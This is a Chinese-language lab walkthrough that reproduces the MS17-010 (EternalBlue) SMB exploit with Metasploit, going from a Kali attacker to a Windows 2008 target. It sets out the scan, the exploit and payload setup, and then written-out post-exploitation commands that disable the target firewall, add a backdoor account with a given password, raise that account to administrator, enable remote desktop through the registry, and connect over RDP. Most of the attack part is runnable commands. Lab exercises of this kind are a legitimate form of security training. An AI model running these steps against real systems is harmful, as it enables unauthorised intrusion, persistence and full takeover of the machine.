漏洞复现-MS17-010(永恒之蓝)

漏洞介绍

永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞，该漏洞导致攻击者在目标系统上可以执行任意代码。
注：SMB服务的作用：该服务在Windows与UNIX系列OS之间搭起一座桥梁，让两者的资源可互通有无

复现环境

攻击机：kali 　　 IP：192.168.232.130
靶 机：windows 2008 IP：192.168.232.129
启动数据库：Msfdb start 或者 service postgresql start
启动数据库的话运行msf会更快，可开可不开，看自己心情

1、启动msfconsole

输入msfconsole

2、搜索ms17_010漏洞

3、用搜索模块对靶机进行漏洞扫描

存在漏洞

4、攻击

back，选择攻击模块


set payload ：设置payload(有效载荷)

set lhost：设置攻击者IP


netsh advfirewall set allprofiles state off
关闭目标防火墙

5、后渗透

2008会检测密码复杂性，不能设弱口令密码
创建用户名密码 blue/[email protected]#$1234qwe

C:\Windows\system32>net user blue [email protected]#$1234qwe /add

将用户blue添加入管理组
C:\Windows\system32>net localgroup administrators blue /add

开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

远程桌面连接
rdesktop 192.168.232.129:3389